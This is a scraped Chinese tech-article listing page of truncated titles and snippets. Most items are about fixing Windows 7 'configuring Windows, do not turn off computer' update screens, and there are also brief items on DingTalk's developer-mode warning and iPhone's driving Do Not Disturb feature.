    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57